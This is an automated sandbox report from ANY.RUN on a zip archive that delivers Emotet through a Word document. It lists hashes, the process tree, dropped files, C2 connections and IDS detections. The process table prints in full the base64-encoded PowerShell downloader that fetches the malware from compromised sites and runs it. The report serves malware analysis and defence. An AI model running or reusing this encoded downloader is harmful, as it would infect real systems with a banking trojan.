analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

79cff238b86750bc8e5dbf094f015573a08e2e2a (1).zip

Full analysis: https://app.any.run/tasks/fdce6102-70ae-41f1-984b-a5681ac36149
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: September 19, 2019, 11:31:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
opendir
trojan
evasion
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

FA2A3536EA6263638C0E56B18C19E133

SHA1:

1689F171C687FB5D1D92A2218C6F230ECDBAB064

SHA256:

CA2F9A0E89213489A80EA74056CA2380FA15FB941887FF1D654A5DEEBA47E594

SSDEEP:

3072:F9jRb3ED3UFIdWy8QQnEPA6U0DOYnt9OQOC:F9xE7kQBI6U2fn3r

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops known malicious document

      • WinRAR.exe (PID: 3532)

    • Application was dropped or rewritten from another process

      • 768.exe (PID: 3536)
      • easywindow.exe (PID: 2840)
      • easywindow.exe (PID: 3996)
      • 768.exe (PID: 3556)
      • easywindow.exe (PID: 4040)
      • ebuQuzTL8.exe (PID: 2176)
      • ebuQuzTL8.exe (PID: 3408)
      • easywindow.exe (PID: 2756)
      • ebuQuzTL8.exe (PID: 2628)
      • ebuQuzTL8.exe (PID: 320)
      • easywindow.exe (PID: 3612)
      • easywindow.exe (PID: 2704)

    • Emotet process was detected

      • 768.exe (PID: 3536)
      • ebuQuzTL8.exe (PID: 2176)

    • Connects to CnC server

      • easywindow.exe (PID: 2840)
      • easywindow.exe (PID: 3612)

    • EMOTET was detected

      • easywindow.exe (PID: 2840)
      • easywindow.exe (PID: 3612)

    • Changes the autorun value in the registry

      • easywindow.exe (PID: 2840)
      • easywindow.exe (PID: 3612)

  • SUSPICIOUS

    • Application launched itself

      • easywindow.exe (PID: 3996)
      • 768.exe (PID: 3556)
      • ebuQuzTL8.exe (PID: 320)
      • easywindow.exe (PID: 4040)

    • Executable content was dropped or overwritten

      • 768.exe (PID: 3536)
      • powershell.exe (PID: 3124)
      • ebuQuzTL8.exe (PID: 2176)
      • easywindow.exe (PID: 2840)

    • PowerShell script executed

      • powershell.exe (PID: 3124)

    • Creates files in the user directory

      • powershell.exe (PID: 3124)

    • Executed via WMI

      • powershell.exe (PID: 3124)

    • Starts itself from another location

      • 768.exe (PID: 3536)
      • ebuQuzTL8.exe (PID: 2176)

    • Connects to server without host name

      • easywindow.exe (PID: 3612)

    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 3568)

  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 3568)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3568)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3568)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 79cff238b86750bc8e5dbf094f015573a08e2e2a
ZipUncompressedSize: 154526
ZipCompressedSize: 105503
ZipCRC: 0x09328d78
ZipModifyDate: 2019:09:16 12:12:02
ZipCompression: Deflated
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
15
Malicious processes
13
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start winrar.exe no specs winword.exe powershell.exe 768.exe no specs #EMOTET 768.exe easywindow.exe no specs #EMOTET easywindow.exe ebuquztl8.exe no specs ebuquztl8.exe no specs ebuquztl8.exe no specs #EMOTET ebuquztl8.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs #EMOTET easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
3532"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\79cff238b86750bc8e5dbf094f015573a08e2e2a (1).zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
3568"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\doc.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3124powershell -enco JABIAFYAUwAwADgANAByAEEAPQAnAFkATQA4AGwASQBOACcAOwAkAFkAdAAzAE4AcQB1AGkAIAA9ACAAJwA3ADYAOAAnADsAJAB6AEgAbQBBAHEAaQB6AD0AJwBSAFIANgBUAEkAUgAnADsAJABGAFgAWQBPAFkATwBJAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABZAHQAMwBOAHEAdQBpACsAJwAuAGUAeABlACcAOwAkAFAASQBiAGYAaQBYAEUASAA9ACcAYgBIAHQAQQA2AE8AQQAnADsAJABHAHAAUQB0AEwASABjAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABOAGUAVAAuAFcAZQBiAGMATABJAGUAbgB0ADsAJAB0ADQATgBqADIASgBIAEQAPQAnAGgAdAB0AHAAcwA6AC8ALwBhAHUAdABvAHIAZQBwAHUAZQBzAHQAbwBzAGQAbQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AQwBpAGwAbwBYAEkAcAB0AEkALwBAAGgAdAB0AHAAcwA6AC8ALwBwAGUAcAAtAGUAZwB5AHAAdAAuAGMAbwBtAC8AZQBlAGQAeQAvAHgAeAAzAHkAcwBwAGsAZQA3AF8AbAA3AGoAcAA1AC0ANAAzADAAMAA2ADcAMwA0ADgALwBAAGgAdAB0AHAAOgAvAC8AZABhAG4AYQBuAGcAbAB1AHgAdQByAHkALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8ASwBUAGcAUQBzAGIAbAB1AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AZwBjAGUAcwBhAGIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGMAdQBzAHQAbwBtAGkAegBlAC8AegBVAGYASgBlAHIAdgB1AE0ALwBAAGgAdAB0AHAAcwA6AC8ALwBiAG8AbgBkAGEAZwBlAHQAcgBpAHAALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB5ADAAZwBtADMAeAB4AHMAXwBoAG0AbgB3ADgAcgBxAC0ANwA2ADQAMQA2ADEANgA5ADkALwAnAC4AIgBTAFAAYABMAEkAVAAiACgAJwBAACcAKQA7ACQAYgBWAG4AZgBIAHoAYwBwAD0AJwBJAEUAcQBOAEoANgAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBqADkAbwB3AGoAUABqACAAaQBuACAAJAB0ADQATgBqADIASgBIAEQAKQB7AHQAcgB5AHsAJABHAHAAUQB0AEwASABjAC4AIgBEAGAATwBgAFcATgBsAE8AQQBkAGYAYABJAGwARQAiACgAJABFAGoAOQBvAHcAagBQAGoALAAgACQARgBYAFkATwBZAE8ASQApADsAJAB6AGMAdgBpADQAcgA9ACcAegBmAFYAWABxAFQAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABGAFgAWQBPAFkATwBJACkALgAiAEwARQBuAGAARwBgAFQAaAAiACAALQBnAGUAIAAzADQAOAA5ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGAAQQBSAFQAIgAoACQARgBYAFkATwBZAE8ASQApADsAJABoAHEAbgBVAHIARgB0AEwAPQAnAFEAMgA1AGsARgBSAEsAQgAnADsAYgByAGUAYQBrADsAJAB3AGMANwBaAHoAMwA9ACcAYQBhADIAVQBPAFgAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQB1AFMAVwBCAFcAPQAnAG8AYgBEADcAUABGAGoAUwAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3556"C:\Users\admin\768.exe" C:\Users\admin\768.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service
Exit code:
0
Version:
12.0.7601.17514 (win7sp1_rtm.101119-1850)
3536--2903b4b7C:\Users\admin\768.exe
768.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service
Exit code:
0
Version:
12.0.7601.17514 (win7sp1_rtm.101119-1850)
3996"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe768.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service
Exit code:
0
Version:
12.0.7601.17514 (win7sp1_rtm.101119-1850)
2840--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service
Exit code:
0
Version:
12.0.7601.17514 (win7sp1_rtm.101119-1850)
2628"C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exe"C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3408"C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exe"C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exeebuQuzTL8.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
320--e1884024C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exeebuQuzTL8.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
23 087
Read events
9 545
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
12
Text files
3
Unknown types
45

Dropped files

PID
Process
Filename
Type
3568WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE41B.tmp.cvr
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55240EA.wmf
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4BEA5888.wmf
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB5EB7D6.wmf
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC81AA54.wmf
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9490782.wmf
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\227212E0.wmf
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD305BEE.wmf
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\41F9E2C.wmf
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A370A11A.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
75
DNS requests
61
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3124
powershell.exe
GET
301
104.31.76.148:80
http://danangluxury.com/wp-content/uploads/KTgQsblu/
US
shared
3612
easywindow.exe
GET
69.43.168.232:443
http://69.43.168.232:443/whoami.php
US
malicious
3612
easywindow.exe
GET
69.43.168.232:443
http://69.43.168.232:443/whoami.php
US
malicious
2840
easywindow.exe
POST
59.152.93.46:443
http://59.152.93.46:443/teapot/
BD
malicious
2840
easywindow.exe
POST
200
185.129.92.210:7080
http://185.129.92.210:7080/prov/scripts/nsip/merge/
AZ
binary
257 Kb
malicious
2840
easywindow.exe
POST
91.92.191.134:8080
http://91.92.191.134:8080/site/publish/
IR
malicious
3612
easywindow.exe
GET
200
185.187.198.4:8080
http://185.187.198.4:8080/whoami.php
RU
text
13 b
malicious
3568
WINWORD.EXE
GET
200
52.109.32.27:80
http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023
GB
xml
1.99 Kb
whitelisted
3612
easywindow.exe
POST
200
69.43.168.232:443
http://69.43.168.232:443/entries/
US
binary
132 b
malicious
3612
easywindow.exe
GET
200
185.187.198.4:8080
http://185.187.198.4:8080/whoami.php
RU
text
13 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2840
easywindow.exe
91.92.191.134:8080
Information Technology Company (ITC)
IR
malicious
2840
easywindow.exe
59.152.93.46:443
Zipnet Limited DKB AS number
BD
malicious
3124
powershell.exe
176.58.116.140:443
pep-egypt.com
Linode, LLC
GB
unknown
3124
powershell.exe
104.31.76.148:443
danangluxury.com
Cloudflare Inc
US
shared
2840
easywindow.exe
185.129.92.210:7080
Bravo Online Systems LLC
AZ
malicious
3124
powershell.exe
104.31.76.148:80
danangluxury.com
Cloudflare Inc
US
shared
3612
easywindow.exe
69.43.168.232:443
Castle Access Inc
US
malicious
3124
powershell.exe
173.212.231.135:443
autorepuestosdml.com
Contabo GmbH
DE
unknown
3612
easywindow.exe
184.106.54.10:995
secure.emailsrvr.com
Rackspace Ltd.
US
malicious
3612
easywindow.exe
188.125.73.109:993
imap.aol.com
CH
unknown

DNS requests

Domain
IP
Reputation
autorepuestosdml.com
  • 173.212.231.135
unknown
pep-egypt.com
  • 176.58.116.140
malicious
danangluxury.com
  • 104.31.76.148
  • 104.31.77.148
unknown
pop3.telefonica.net
  • 86.109.99.71
unknown
secure.emailsrvr.com
  • 184.106.54.10
shared
st.ot.ou
unknown
ia.alyhocm
unknown
pop.ctcweb.net
  • 137.118.46.216
unknown
pop.biz.rr.com
  • 107.14.166.78
shared
pp.esme
unknown

Threats

PID
Process
Class
Message
2840
easywindow.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 23
2840
easywindow.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
2840
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2840
easywindow.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 20
2840
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2840
easywindow.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
2840
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3612
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3612
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3612
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
16 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
79cff238b86750bc8e5dbf094f015573a08e2e2a (1).zip